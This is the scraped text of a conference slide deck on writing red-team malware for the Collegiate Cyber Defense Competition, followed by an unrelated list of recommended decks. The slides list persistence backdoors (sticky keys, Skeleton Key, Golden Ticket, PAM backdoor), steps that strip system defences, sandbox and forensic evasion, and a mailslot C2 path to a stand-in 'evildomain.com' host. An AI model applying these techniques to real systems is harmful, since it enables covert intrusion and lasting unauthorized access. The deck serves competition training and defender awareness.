writing malware while the blue team is staring at you
play

Writing malware while the blue team is staring at you - PowerPoint PPT Presentation

Jan 04, 2023 •414 likes •1.02k views

Mubix Rob Fuller Writing malware while the blue team is staring at you meterpreter> getuid @mubix Father Husband United States Marine Co-Founder of NoVA Hackers Technical Consultant to HBOs Silicon Valley Security+, Linux+, A+,

  1. Mubix “Rob” Fuller Writing malware while the blue team is staring at you

  2. meterpreter> getuid @mubix Father Husband United States Marine Co-Founder of NoVA Hackers Technical Consultant to HBO’s Silicon Valley Security+, Linux+, A+, Network+, Expired CEH

  3. What are you actually going to be talking about?

  4. What is CCDC

  5. What is CCDC? Collegiate Cyber Defense Competition College students fix / defend / maintain networks Professional Red Team attacks student teams while they are trying to do the above College/University (some), State (some), Regional and National competitions

  6. “Win” Conditions Blue teams gain or loose points based on: Completing business “injects”, which are basically business requirements such as “add these 100 users to the domain” Stopping the red team from gaining access to systems or sensitive data Answering “orange/black/blue” team requests BUT, the primary point values come from uptime/SLA

  7. Red Team Goals Gain access FAST before passwords are changed, remote exploits are rare these days and takes too long to find. Install persistence that can stay invisible so that you can keep access for 48 hours Include just enough features so that you can effect the “Win” conditions when needed

  8. Agenda Install Persistence Network “Cloud” Forensics Reversing End Result

  9. Who Pentesters / Red Teamers SOC Analysts Malware Reverse Engineers Social Engineers Forensics Scientists

  10. This is from the mindset of CCDC, not: pentesting {red|blue|purple} teaming

  11. Install Speed is key, and it needs to be throw away

  12. What does the blue team do? Change passwords Install Patches Pull the plug (they can get kicked from the competition by doing this)

  13. What are my priorities? Find a default /weak password Install quickly on as many systems as possible The first 10 – 120 seconds of the competition usually gives the Red Team indicators of which team will win the competition Don’t mess up! Please work!

  14. Install IMPORTANT NOT IMPORTANT Throw away AV Speed HIPS Size White listing Ease to deploy

  15. Most tools are not built with CCDC in mind.

  16. Empire POSITIVE NEGATIVE No (pre-shell) built in network Multiple deployment file options deployment options (DLL / HTA / BAT etc) Windows only BAT files as a “melt” functionality (There is EmPyre, but I don’t have experience with it at CCDC yet) Some teams are quick to block or just delete powershell.exe Minimal automation options Persistence methods are too slow by default for 48 hour competitions

  17. Metasploit POSITIVE NEGATIVE Multiple deployment file options Not very many persistence methods (EXE, DLL, BAT, etc, etc) REVERSE_TCP is easy to spot in Multiple network deployment TCPView or Netstat options (psexec / other exploit modules) SSH / SMB .. Um… Meterpreter... Very easy to script Threading

  18. Metasploit

  20. Impacket POSITIVE NEGATIVE WMI, PSEXEC deployment options Windows only that support pass-the-hash Simple SMB Server Library that is very fast and easy to script

  21. Impacket SMB Server Easiest SMB server to set up ever… plus it logs creds....

  22. Innuendo POSITIVE NEGATIVE Built in “melt” options Costs a lot of money Huge binary for deployment Very few network deployment options Not easy to automate

  23. BAT Files / BASH Scripts This is where the “magic” happens and they are just a list of commands to run for the Installs to happen

  24. Install IMPORTANT NOT IMPORTANT Throw away AV Speed HIPS Size White listing Ease to deploy

  25. Build your own Rapid fire PSEXEC MSF Resource File Impacket scripts https://github.com/mubix/ccdc_malware/tree/master/install

  26. Persistence How much, and where matters

  27. What does the blue team do? Look for rogue processes Look for rogue connections Look for rogue services / users Look for rogue scheduled tasks (sometimes) Look for executables in %TEMP% Wireshark

  28. What are my priorities? Make as minimal amount of connections outbound as possible Install more than one way in just in case they find one or more Installing persistence methods that install other persistence methods Installing persistence methods that install other persistence methods that install other persistence methods Installing persistence methods that install other persistence methods that install other persistence methods that install other persistence methods Make a box easy to get back into if all persistence methods are found.

  29. How much? Again, 1 persistence method is [NOT] enough Traditional options: https://attack.mitre.org/wiki/Persistence http://www.fuzzysecurity.com/tutorials/19.html http://www.hexacorn.com/blog/category/autostart-persistence/ http://gladiator-antivirus.com/forum/index.php?showtopic=24610 https://khr0x40sh.wordpress.com/2015/01/13/meterpreter-post-module- persistence-via-mofpowershell/ http://www.dshield.org/diary/Wipe%2Bthe%2Bdrive!%2B%2BStealthy%2B Malware%2BPersistence%2BMechanism%2B-%2BPart%2B1/15394

  31. Powershell Autoruns https://github.com/p0w3rsh3ll/AutoRuns

  32. Metasploit Binaries SHIKATA_GA_NAI is [NOT] antivirus bypass Connect to hander 1. Read a 4-byte length 2. Allocate length-byte buffer, and mark it as writable / executable 3. Read length bytes into that buffer 4. Jump to that buffer. 5. -- egypt See: https://github.com/rsmudge/metasploit-loader (Windows)

  33. Windows Password Persistence [If] you have 445 access to the Domain Controller Golden Ticket (krbtgt) DCSync Skeleton Key SSP Installation [If] you have 3389 access to a server Sticky Keys Utilman Display Switcher

  34. Windows DeSecurity Allow NULL Sessions Enable Telnet server on high port Reset / Clear Firewall Rules ( Allow LM storage / Store passwords +Exceptions ) in reversible encryption Better than installing a new rule… Enable WinRM (HTTP and HTTPS) Enable Teredo (if Internet access is Give Guest, Domain Users, and in play) Users Read/Write to ALL files and folders Minimal Password Age = 365 PSEXEC as GUEST Add SYSVOL to $PATH

  35. Linux DeSecurity SETUID binary Enable database plugins and stored procedures chattr +I /etc/shadow Backdoor PAM Enable RSH Disable ASLR Set Apache to run as root Disable SELinux Skeleton key SSH Add APT package repo + key and entry into /etc/hosts

  36. DeSecurity https://github.com/mubix/ccdc_malware/tree/master/desecurity

  37. Network How do you hide on the network?

  38. What does the blue team do? TCPView Wireshark Netstat

  39. What are my priorities? Multiple channels Low and slow for reestablishment Fast rotating communications to keep up the whack-a-mole Fit into “normal” if at all possible. On a CCDC network this is virtually impossible because the only other people on the network other than you and the blue team is _sometimes_ an orange team. Waste blue teamer’s time with false C2

  40. What protocol? IRC ICMP HTTP(S) Email DNS Straight TCP Others?

  41. Cobalt Strike DNS Beacon is pretty sweet… _IF_ the students keep DNS working ... HTTP/S Beacons work well but HTTP/S connections are heavily scrutinized

  42. CANVAS / Innuendo POSITIVE NEGATIVE Email C2 Costs a lot of money (Outlook and Thunderbird) if in Huge binary for deployment use in the network Very few network deployment HTTP/S and DNS channels, same as options Cobalt Strike Not easy to automate ICMP, FTP and IMAP channels

  43. Mailslot! Sorta like a Named Pipe for an entire domain Write file: \\.\mailslot\malware\checkin \\team1.com\mailslot\checkin \\*\mailslot\malware\checkin Blends in to SMB traffic, and Impacket’s SMB server supports it with some tweaks makes C2 over UDP 137 if it is allowed outbound Max size 424 bytes

  44. Mailslot! Sorta like a Named Pipe for an entire domain Write file: \\.\mailslot\malware\checkin \\team1.com\mailslot\checkin \\*\mailslot\malware\checkin \\evildomain.com\callhome\checkin Blends in to SMB traffic, and Impacket’s SMB server supports it with some tweaks makes C2 over UDP 137 if it is allowed outbound Max size 424 bytes

  45. Internet SOC Beatings What “cloud” means to a malware writer

  46. What does the blue team do? Upload to sites like VirusTotal, Malwr, other sandboxes to find out what the malware does Happens on pentests and red team assessments too L IT TAKES A LONG TIME TO DEVELOP THESE THINGS L

  47. What are my priorities? Add sandbox detection… this is a cat and mouse game Make it so you don’t care if they upload it

  48. What are they using? VirusTotal AntiVirus auto “cloud” submissions Malwr.com Others?

  49. EBowla https://github.com/Genetic-Malware/Ebowla

  50. Forensics HDD, Registry, Memory, Network

  51. What does the blue team do? Sometimes done, but usually a revert is done instead

  52. What are my priorities? Noise. Forensics is getting pretty good these days so instead of worrying about it I just add noise to it Time stomp things I want to stay around longer Don’t use SYSTEM32 or the WINDOWS directory. There are plenty of others J

  53. Noise building - CSC.exe C# Compiler installed built in to the .NET framework Compile C# code from a text file (.cs) with an output exe to be dumped in the directories in $PATH randomly

Recommend

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

540 views • 42 slides
Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

570 views • 22 slides
DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY

DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY

DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY Blue Teaming DIY Blue Teaming Ways to make malware not work Security by obscurity (because sucker punches work, even though nobody wants to admit

1.11k views • 78 slides
WOPR SUMMIT Red v Blue Workshop What will we do today? Red / Blue Team Theory APT

WOPR SUMMIT Red v Blue Workshop What will we do today? Red / Blue Team Theory APT

WOPR SUMMIT Red v Blue Workshop What will we do today? Red / Blue Team Theory APT Emulation Kill Chain Phishing Dropper Some Detection Expansion Deep Persistence Actions on goals Exfiltration

1.58k views • 140 slides
Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and

Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and

Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and Needs 117,000!child!care!centers!in!the!US! Over!10.9!million!children!under!5! 115,000!elementary!schools!in!the!US! 2011!Census! !

458 views • 13 slides
Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and

Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and

Sketch Model Review Blue!Team!!Sec,on!A! October!3,!2013! 2.009%%Blue%A ! 1% Problems and Needs 117,000!child!care!centers!in!the!US! Over!10.9!million!children!under!5! 115,000!elementary!schools!in!the!US! 2011!Census! !

609 views • 11 slides
Charcoal Briquettes Cheap, environmentally-friendly bio fuel and devices 2.009 Blue Team A

Charcoal Briquettes Cheap, environmentally-friendly bio fuel and devices 2.009 Blue Team A

Charcoal Briquettes Cheap, environmentally-friendly bio fuel and devices 2.009 Blue Team A Dexter Ang, John Brewer, Kevin Chen, Greg Fonder, Danny Hilton, Matt Krueger, Andres Pino 2.009 Blue Team A October 7, 2004 Piston Extrusion 2.009

420 views • 4 slides
St Staring g into the Abyss: ss: An Evaluation of Co Concurrency Co y Control wi with O One

St Staring g into the Abyss: ss: An Evaluation of Co Concurrency Co y Control wi with O One

St Staring g into the Abyss: ss: An Evaluation of Co Concurrency Co y Control wi with O One T Thousand Co Cores Xiangyao Yu 1 George Bezerra 1 Andrew Pavlo 2 Srinivas Devadas 1 Michael Stonebraker 1 1 CSAIL, 2 Dept. of Computer Science

776 views • 32 slides
Writing for the Web Content Management Support Team Writing for the Web Todays session: 1.

Writing for the Web Content Management Support Team Writing for the Web Todays session: 1.

Writing for the Web Content Management Support Team Writing for the Web Todays session: 1. Audience Identifying and understanding your audience and their needs Message, conversation, relationship, trust 2. Style Inverted pyramid

427 views • 18 slides
Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Charcoal Briquettes Mockup Review 2.009 Blue Team A Dexter Ang, John Brewer, Kevin Chen,

Charcoal Briquettes Mockup Review 2.009 Blue Team A Dexter Ang, John Brewer, Kevin Chen,

Charcoal Briquettes Mockup Review 2.009 Blue Team A Dexter Ang, John Brewer, Kevin Chen, Greg Fonder, Danny Hilton, Matt Krueger, Andres Pino 2.009 Blue Team A October 21, 2004 Key Challenges Loading Hopper design Position of

309 views • 11 slides
Part rt 2: Writing g a Successf ccessful Narra rrative ve, Red ed Team am Revi view ews

Part rt 2: Writing g a Successf ccessful Narra rrative ve, Red ed Team am Revi view ews

Strat ategi gies f s for or Planni anning ng, D Devel evelopi oping ng, , and and Writing g Lar Large ge Team G eam Grant ants Part rt 2: Writing g a Successf ccessful Narra rrative ve, Red ed Team am Revi view ews s

607 views • 26 slides
How to Spot the Blue Team? Red Team Infrastructure Security R.A.H. Lahaye Supervisors: Marc

How to Spot the Blue Team? Red Team Infrastructure Security R.A.H. Lahaye Supervisors: Marc

How to Spot the Blue Team? Red Team Infrastructure Security R.A.H. Lahaye Supervisors: Marc Smeets and Mark Bergman Outflank Research Project 2 System and Network Engineering University of Amsterdam February 5, 2018 R.A.H. Lahaye How to

375 views • 26 slides
3 Tips for Writing Winning Content Charlotte Hicks Crockett Content Marketing Goals Attract

3 Tips for Writing Winning Content Charlotte Hicks Crockett Content Marketing Goals Attract

3 Tips for Writing Winning Content Charlotte Hicks Crockett Content Marketing Goals Attract leads Move prospect toward a sale Backend sales, retention Tip #1 Drama vs Imagery Not this staring at the collapse of your

565 views • 19 slides
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal paul@gtisc.gatech.edu Agenda Modern Malware Obfuscations, Server-side Polymorphism, Collection Volume Malware Analysis Detection

504 views • 27 slides
Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that does something that causes harm to a user, computer or network, including viruses, trojan horses, worms, rootkits, scareware and spyware. Malware

119 views • 9 slides
GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS AGENDA Something about malware Malware internals Current analysis

398 views • 27 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
11-823 Conlanging Writing Writing Systems Different Writing Systems What makes a writing

11-823 Conlanging Writing Writing Systems Different Writing Systems What makes a writing

11-823 Conlanging Writing Writing Systems Different Writing Systems What makes a writing system Standardization vs Historical artifacts Constructed Writing Systems Computing and its influence on writing Types of Writing

528 views • 24 slides
Blue Teams Sharmila B. Vaswani-Bowles - Cyber Acquisition Blue Team (CABT) Management Office

Blue Teams Sharmila B. Vaswani-Bowles - Cyber Acquisition Blue Team (CABT) Management Office

Certification and Standards for Army Blue Teams Sharmila B. Vaswani-Bowles - Cyber Acquisition Blue Team (CABT) Management Office Lead Ensuring Cyber Resiliency In All Phases of Acquisition Rolando Lopez - Lead Computer Engineer 1 The

516 views • 20 slides
Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Overview Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer immunization Kjell Jrgen Hole Simula@UiB 4. Epidemiological model 5. Malware halting analysis 6. Malware halting method Last updated

672 views • 29 slides
Beta Presentation Next Generation Malware Analysis System The Capstone Experience Team

Beta Presentation Next Generation Malware Analysis System The Capstone Experience Team

Beta Presentation Next Generation Malware Analysis System The Capstone Experience Team Proofpoint Brad Doherty Crystal Lewis Yash Patel Graham Thomas George Zhao Department of Computer Science and Engineering Michigan State University

463 views • 10 slides
Pinkslipbot: A deep look at how malicious code adapts and evolves Guilherme Venere Malware

Pinkslipbot: A deep look at how malicious code adapts and evolves Guilherme Venere Malware

Pinkslipbot: A deep look at how malicious code adapts and evolves Guilherme Venere Malware Researcher Anti Malware Operation Team Know Your Enemy Server-side polymorphic worm. EXE and DLL modules First seen around 2007 Features

662 views • 19 slides
Distributed Database Systems (ECS - 265) Staring into the Abyss : An Evaluation of Concurrency

Distributed Database Systems (ECS - 265) Staring into the Abyss : An Evaluation of Concurrency

Distributed Database Systems (ECS - 265) Staring into the Abyss : An Evaluation of Concurrency Control with One Thousand Cores 1 Presented By Sanjat Mishra 10.09.2018 Road Map 2 2 What this paper is about? What problems does it

804 views • 43 slides

More recommend